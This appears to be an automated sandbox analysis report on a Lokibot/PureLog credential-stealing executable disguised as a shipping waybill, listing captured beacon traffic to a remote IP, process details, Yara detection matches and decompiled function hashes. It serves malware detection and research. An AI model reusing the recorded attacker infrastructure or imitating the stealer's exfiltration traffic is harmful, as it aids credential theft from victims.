Apr 25, 2024 09:43:58.124128103 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:58.941550016 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:58 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:58.941605091 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:58.950481892 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:58.950798035 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:58.950886011 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:58.951003075 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:58.951208115 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:58.951365948 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:58.951409101 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 25, 2024 09:43:58.951447964 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Target ID:	0
Start time:	09:41:52
Start date:	25/04/2024
Path:	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"
Imagebase:	0xc90000
File size:	574'472 bytes
MD5 hash:	34730F3DA822589C3B36EC7197EDE429
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1735740544.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1739256107.0000000009480000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:41:55
Start date:	25/04/2024
Path:	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"
Imagebase:	0x330000
File size:	574'472 bytes
MD5 hash:	34730F3DA822589C3B36EC7197EDE429
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:41:55
Start date:	25/04/2024
Path:	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"
Imagebase:	0xa00000
File size:	574'472 bytes
MD5 hash:	34730F3DA822589C3B36EC7197EDE429
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000003.00000002.2873103232.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	09:41:55
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5516 -s 1376
Imagebase:	0xbb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.5%
Total number of Nodes:	341
Total number of Limit Nodes:	9

Executed Functions

Function 07C97A20 Relevance: 4.0, Strings: 3, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tekq, xrefs: 07C97A89
Tekq, xrefs: 07C97C4E
)", xrefs: 07C97ACA

Memory Dump Source

Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID: Tekq$Tekq$)"
API String ID: 0-573440039
Opcode ID: e07794ff1b8384d220b0511f0def2cb44eb2c43f6209716905627d9c4f6c02c1
Instruction ID: f89ebbd5314fab2eaaf8a448c40508c19354f1a720f9b699dd4b9d6763d64ad4
Opcode Fuzzy Hash: e07794ff1b8384d220b0511f0def2cb44eb2c43f6209716905627d9c4f6c02c1
Instruction Fuzzy Hash: DB81E4B4E112099FCB44CFAAC985AAEFBB2FF89310F24902AD415AB354DB345905CF54

Uniqueness

Uniqueness Score: -1.00%

Function 07C89C88 Relevance: 1.9, APIs: 1, Instructions: 368
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 07C8A0CF

Memory Dump Source

Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ea0bebb1bd5ef7f3aa48f2a4a21af125a8600a1123f1aa3f7f9d6a994fc82c2b
Instruction ID: e7400bcb2948cdb9d35bfe00d405dcb2469909728932717eb6b7357144efb846
Opcode Fuzzy Hash: ea0bebb1bd5ef7f3aa48f2a4a21af125a8600a1123f1aa3f7f9d6a994fc82c2b
Instruction Fuzzy Hash: 4AD1BCB17402058FDB69EBB5C4507AFB7F6AF89708F10846EE14A9B390CB35E901CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07C99BC0 Relevance: 1.6, Strings: 1, Instructions: 302COMMON

Download Yara Rule

Strings

tIh, xrefs: 07C99F75

Memory Dump Source

Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID: tIh
API String ID: 0-443931868
Opcode ID: 165e67bb73e0998927c8ae63c78c3e3f6853f697d7df3ce4e9e859f5b322a469
Instruction ID: 7f0c970379e15d9266e81bf5f2d3cba3efa1e6ce4b4d6053bf8d65f623a2e776
Opcode Fuzzy Hash: 165e67bb73e0998927c8ae63c78c3e3f6853f697d7df3ce4e9e859f5b322a469
Instruction Fuzzy Hash: F6D14AB0D1520ADFCB44CF9AD4898AEFBB6FF89300F10D569D415AB254E734AA42CF94

Uniqueness

Uniqueness Score: -1.00%

Function 05681808 Relevance: .6, Instructions: 588COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3668609b58136634be8d5f1ab507300ba00f017c26c75f8244c9c8ce55a59df
Instruction ID: 9522a5ef380453ea85530fc0d70ecf97e3c4fc3684ff9daf4540bddd82b91410
Opcode Fuzzy Hash: d3668609b58136634be8d5f1ab507300ba00f017c26c75f8244c9c8ce55a59df
Instruction Fuzzy Hash: B1524C34A003058FCB14DF68C844B99B7B2FF8A314F2587A9D5596F3A1DB71A986CF80

Uniqueness

Uniqueness Score: -1.00%

Function 056817F8 Relevance: .6, Instructions: 576COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c85ccf8f07bff6008651442499ed63212d640383bf8fdf26e24ac09fa97c495c
Instruction ID: 1be026d9d74d4f7aefb6ab6b3b3529d27ac49f2d3b56326eff79ca765e13c2ea
Opcode Fuzzy Hash: c85ccf8f07bff6008651442499ed63212d640383bf8fdf26e24ac09fa97c495c
Instruction Fuzzy Hash: 20524E34A003458FCB14DF68C844B99B7B2FF85314F2587A9D5596F3A2DB71A986CF80

Uniqueness

Uniqueness Score: -1.00%

Function 055A1CC4 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736936789.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_55a0000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e16dfbddec289f5439c97268e4b62c734597ce4f131757ab75cb23fd61b2df2
Instruction ID: 4ca112798e58961c9ced8e8f25ac3659533932df3d048e1a0c827af25ba27055
Opcode Fuzzy Hash: 8e16dfbddec289f5439c97268e4b62c734597ce4f131757ab75cb23fd61b2df2
Instruction Fuzzy Hash: 65A18435E1031A8FCB04DFA4D9549EDFBBAFF99300F148619E416AB265EF30A985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 07C9CC18 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d466161fb9e20a3924fb86d04ef297b864d1bf949b15a4c87185a4a92f68b4a
Instruction ID: f78dc54daf21a70b7445bc00cd82904da1f8f646821e947ea62ce7609228a093
Opcode Fuzzy Hash: 1d466161fb9e20a3924fb86d04ef297b864d1bf949b15a4c87185a4a92f68b4a
Instruction Fuzzy Hash: 819139B0D15209DFCF58CFA6D58499DFBB2FB8A310F20A42AE416B7264D7349945CF24

Uniqueness

Uniqueness Score: -1.00%

Function 055A1CB8 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736936789.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_55a0000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 657c4eaf257d3ec57aa86313cf0dae24d5f6e6a4ba60aa73529170067efd6aae
Instruction ID: f40f92c1ce87a3ac7684570430404de884a30d3500d48a9683febb80a82641ff
Opcode Fuzzy Hash: 657c4eaf257d3ec57aa86313cf0dae24d5f6e6a4ba60aa73529170067efd6aae
Instruction Fuzzy Hash: DB918139E1031A9FCB04DFA0D9549DDFBBAFF8A300F148615E416AB264EB30A985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 055A2B11 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736936789.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_55a0000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd233b689a3587cf6267a19be50dab9ca35d55cefd9899899473606c71f121ed
Instruction ID: bf9c80d016ce5787d74b0c85193fd3966f59bd92416c037aea8641ca8d783e53
Opcode Fuzzy Hash: cd233b689a3587cf6267a19be50dab9ca35d55cefd9899899473606c71f121ed
Instruction Fuzzy Hash: 14917139E1031A9FCB04DFA0D9549DDFBBAFF89300F158615E416AB264EB30A985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 07C9C900 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e458b6f7157e28d778cbb44fcd640a41eb55a15e69624134311e64f97a67952
Instruction ID: 3b37f2c7f5d329b04dd2e973ec2bfe982aa6f98c46c97d7d370e0ebd703baf3e
Opcode Fuzzy Hash: 9e458b6f7157e28d778cbb44fcd640a41eb55a15e69624134311e64f97a67952
Instruction Fuzzy Hash: E38105B4E14219DFCF54CFAAC8849AEFBB2FB89300F10956AD815B7254D7349942CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 07C98D10 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ca1e40ce490b4ac2eabd654eb57f002050ab424cf63a3c0a656b82a4987f6e
Instruction ID: a1a5ff569d73fa9c4080508d989116d9d7f1a17a8b2400db9413a7246b496891
Opcode Fuzzy Hash: 72ca1e40ce490b4ac2eabd654eb57f002050ab424cf63a3c0a656b82a4987f6e
Instruction Fuzzy Hash: C021ECB1E006198BDB58CFABD9452DEFBF7AFC9310F14C07AD509A6254DB701A45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 07C80180 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b3733e48fccf3d00d3c7584067569e649cdbda0685a484a5f08199edad68976
Instruction ID: a69133768ffd25afbefb854cb4a00b6a6cc592efdecb5dc05bb7f14d5d54e371
Opcode Fuzzy Hash: 8b3733e48fccf3d00d3c7584067569e649cdbda0685a484a5f08199edad68976
Instruction Fuzzy Hash: AB21C7B1D016189BEB18DF9BD8457DEFBF6AFC9314F14C06AD408A6264DB740985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0568B814 Relevance: 2.7, Strings: 2, Instructions: 215
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hoq, xrefs: 0568B8F0
Hoq, xrefs: 0568B956

Memory Dump Source

Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID: Hoq$Hoq
API String ID: 0-3106737575
Opcode ID: 79af4675b1a7a63e22e2dffe64be27d3ed1677f28183005133717a2dc5d6c7bd
Instruction ID: 19b99dc58db72ac0dd59412618239d839b7c680e82e05078007c343066100aaf
Opcode Fuzzy Hash: 79af4675b1a7a63e22e2dffe64be27d3ed1677f28183005133717a2dc5d6c7bd
Instruction Fuzzy Hash: 40817C70E003199FCB04DFA9C954AAEBBF6FF88300F14816AE409AB365DB749945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05689BD8 Relevance: 2.7, Strings: 2, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hoq, xrefs: 05689E49
Hoq, xrefs: 05689E7B

Memory Dump Source

Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID: Hoq$Hoq
API String ID: 0-3106737575
Opcode ID: b04a6310dec952306b99d00a29156f41e9d255f1cf67daf3cd5de56444eb0bd3
Instruction ID: 6723dfa662c8692d0420c486631c0aea204832d1668965c9386d5afa6450887e
Opcode Fuzzy Hash: b04a6310dec952306b99d00a29156f41e9d255f1cf67daf3cd5de56444eb0bd3
Instruction Fuzzy Hash: 4A715B35B401188FCB15EBA8C5589BEBBF6FF89310B2445A9D401BB7A1CA36ED01CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05684AD0 Relevance: 2.7, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 056869C2
Hoq, xrefs: 05686AE0

Memory Dump Source

Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID: (oq$Hoq
API String ID: 0-3084834809
Opcode ID: 3c0bf3b7f824cb430409e6ba6c2bedc01cab1b1220cf58347600bb25538ec1fe
Instruction ID: 0524eb09bfdb10d10747cbaa71b0338348277241ece3abd042662d03f59033ed
Opcode Fuzzy Hash: 3c0bf3b7f824cb430409e6ba6c2bedc01cab1b1220cf58347600bb25538ec1fe
Instruction Fuzzy Hash: C65124316041119FC715EF68C054ABDBBB6FF94300F2986BAD44A9BB91CE35EC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07C9A200 Relevance: 2.6, Strings: 2, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3H5, xrefs: 07C9A29E
3H5, xrefs: 07C9A290

Memory Dump Source

Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID: 3H5$3H5
API String ID: 0-2752242361
Opcode ID: 6d011182bdae1dfb1eaaa2b3c05cb7d6b6e0c92f7268be4fe827a8883e335c97
Instruction ID: caaa1669a54ab76996d95bd25d8d47892a292550ad8875d84628bca036a9afca
Opcode Fuzzy Hash: 6d011182bdae1dfb1eaaa2b3c05cb7d6b6e0c92f7268be4fe827a8883e335c97
Instruction Fuzzy Hash: 332116B0E10609DFCB88CFAAD544AAEFBF1FF89300F14C5AAD508A7214E7319A45CB41

Uniqueness

Uniqueness Score: -1.00%

Function 07C8619D Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07C863DE

Memory Dump Source

Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4e9f30d0dd7dfbddc8d344294d184b2b549573d7ea70fb84acf627a7a10828c2
Instruction ID: a786a3e17a5baabcd54f7cac2fecccab9284ec8207c66e1524ce87aa9acc57c9
Opcode Fuzzy Hash: 4e9f30d0dd7dfbddc8d344294d184b2b549573d7ea70fb84acf627a7a10828c2
Instruction Fuzzy Hash: 78A15CB1D0021ADFDF54DFA8C980B9DBBB2BF48314F1481A9E808B7251DB759A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 07C861A8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07C863DE

Memory Dump Source

